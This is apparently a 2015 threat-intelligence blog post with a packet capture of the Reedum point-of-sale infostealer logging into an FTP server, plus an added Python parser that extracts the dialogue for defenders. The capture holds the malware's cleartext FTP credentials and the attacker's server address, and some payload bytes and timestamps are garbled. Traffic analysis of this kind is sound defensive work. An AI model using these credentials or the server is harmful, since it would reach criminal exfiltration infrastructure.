Reedum Point of Sale Infostealer Malware using FTP to extract sensitive information Traffic Sample

By | June 19, 2015

1970-01-01 -3:-59:-35.728958 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 1:62, ack 1, win 65535, length 61
E..e….@.`.m…
………..X{.aP…5…220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]

1970-01-01 -3:-59:-35.729226 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 1:17, ack 62, win 64179, length 16
E..8.X@….p
…m…….X{.a…?P…l…USER user37704

1970-01-01 -3:-59:-35.729275 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 17, win 65535, length 0
E..(….@.`.m…
……….?X{.qP…|…
1970-01-01 -3:-59:-35.786678 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 62:141, ack 17, win 65535, length 79
E..w….@.`rm…
……….?X{.qP…kZ..331 ……………… ………… …… …………………… user37704

1970-01-01 -3:-59:-35.786950 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 17:31, ack 141, win 64100, length 14
E..6.Y@….q
…m…….X{.q….P..d….PASS intro22

1970-01-01 -3:-59:-35.787002 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 31, win 65535, length 0
E..(….@.`.m…
………..X{..P…|’..
1970-01-01 -3:-59:-35.847397 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 141:200, ack 31, win 65535, length 59
E..c….@.`.m…
………..X{..P…….230 …………………… user37704 ………………

1970-01-01 -3:-59:-35.849326 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 31:39, ack 200, win 64041, length 8
E..0.Z@….v
…m…….X{……P..)….TYPE A

1970-01-01 -3:-59:-35.849379 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 39, win 65535, length 0
E..(….@.`.m…
………..X{..P…{…
1970-01-01 -3:-59:-35.906660 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 200:238, ack 39, win 65535, length 38
E..N….@.`.m…
………..X{..P…….200 …… ……………….. .. A

1970-01-01 -3:-59:-35.910034 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 39:60, ack 238, win 64003, length 21
E..=.[@….h
…m…….X{……P…d…PORT 10,0,2,15,4,24

1970-01-01 -3:-59:-35.910108 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 60, win 65535, length 0
E..(….@.`.m…
………..X{..P…{…
1970-01-01 -3:-59:-35.967274 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 238:288, ack 60, win 65535, length 50
E..Z….@.`.m…
………..X{..P…p…500 …………………… ………….. PORT

1970-01-01 -3:-59:-35.967782 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 60:110, ack 288, win 63953, length 50
E..Z.\@….J
…m…….X{…..!P…….LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24

1970-01-01 -3:-59:-35.967827 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 110, win 65535, length 0
E..(….@.`.m…
……….!X{..P…{E..
1970-01-01 -3:-59:-34.025035 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 288:324, ack 110, win 65535, length 36
E..L. ..@.`.m…
……….!X{..P…….500 LPRT …. ………………..

1970-01-01 -3:-59:-34.025540 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [F.], seq 110, ack 324, win 63917, length 0
E..(.]@….{
…m…….X{…..EP….r.. ABACF
1970-01-01 -3:-59:-34.025610 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 111, win 65535, length 0
E..(.!..@.`.m…
……….EX{..P…{ ..
1970-01-01 -3:-59:-34.082857 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [F.], seq 324, ack 111, win 65535, length 0
E..(.”..@.`.m…
……….EX{..P…{…
1970-01-01 -3:-59:-34.083025 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [.], ack 325, win 63917, length 0
E..(.^@….z
…m…….X{…..FP….q…. FEE
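The control-channel dialogue above, pulled back out of the tcpdump -A text by a small parser. This is an added example, not code from the blog post or from any analysis of Reedum; SAMPLE is a constructed excerpt of the capture above (hex-dump junk shortened, server reply texts are stand-ins for the lines garbled on the page). It extracts the cleartext credentials, decodes the PORT argument (10,0,2,15,4,24 is the infected host at port 4*256+24 = 1048, which the server is told to connect back to), and records that both active-mode data-channel requests (PORT, then the LPRT fallback) were refused with 500, so nothing was transferred in this session before the client closed it.

```python
import re

HDR = re.compile(r"IP (\d+(?:\.\d+){3})\.(\d+) > (\d+(?:\.\d+){3})\.(\d+): Flags")
CMD = re.compile(r"\b(USER|PASS|TYPE|PORT|LPRT|EPRT|PASV|STOR|QUIT)\b ?(.*)$")
RPL = re.compile(r"(?<!\d)([1-5]\d\d)[ -](.*)$")

# Constructed excerpt of the capture above (junk shortened; reply texts are stand-ins).
SAMPLE = """\
IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], length 16
...m.......X{.a...?P...l...USER user37704
IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], length 79
..........?X{.qP...kZ..331 Password required for user37704
IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], length 14
...m.......X{.q....P..d....PASS intro22
IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], length 59
...........X{..P.......230 User user37704 logged in
IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], length 21
...m.......X{......P...d...PORT 10,0,2,15,4,24
IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], length 50
...........X{..P...p...500 PORT not allowed on this server
IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], length 50
...m.......X{.....!P.......LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24
IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], length 36
..........!X{..P.......500 LPRT not understood
"""

def ftp_dialogue(dump):
    """Return [(side, verb_or_code, argument)]; side is 'C' (to port 21) or 'S'."""
    side, out = None, []
    for line in dump.splitlines():
        h = HDR.search(line)
        if h:  # packet header: decide who is talking; payload lines follow it
            side = "C" if h.group(4) == "21" else "S" if h.group(2) == "21" else None
        elif side and (m := (CMD if side == "C" else RPL).search(line)):
            out.append((side, m.group(1), m.group(2).strip()))
    return out

def decode_port(arg):
    """PORT h1,h2,h3,h4,p1,p2 -> (ip, port) the server is asked to connect back to."""
    h1, h2, h3, h4, p1, p2 = (int(x) for x in arg.split(","))
    return f"{h1}.{h2}.{h3}.{h4}", 256 * p1 + p2

def assess(dump):
    """Defender's summary: cleartext creds, login, active-mode target, refused cmds."""
    msgs = ftp_dialogue(dump)
    creds = {v: a for s, v, a in msgs if s == "C" and v in ("USER", "PASS")}
    refused = [p[1] for p, (_, c, _) in zip(msgs, msgs[1:]) if p[0] == "C" and c[0] in "45"]
    target = next((decode_port(a) for s, v, a in msgs if v == "PORT"), None)
    return {"creds": creds, "logged_in": ("S", "230") in {m[:2] for m in msgs},
            "data_target": target, "refused": refused}
```

Run `assess(SAMPLE)` (or feed it the full dump above) to get the credentials, the decoded data-channel target and the refused commands; a login from a POS host to an external FTP server followed by PORT/LPRT is the sequence worth alerting on, whether or not the transfer succeeds.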
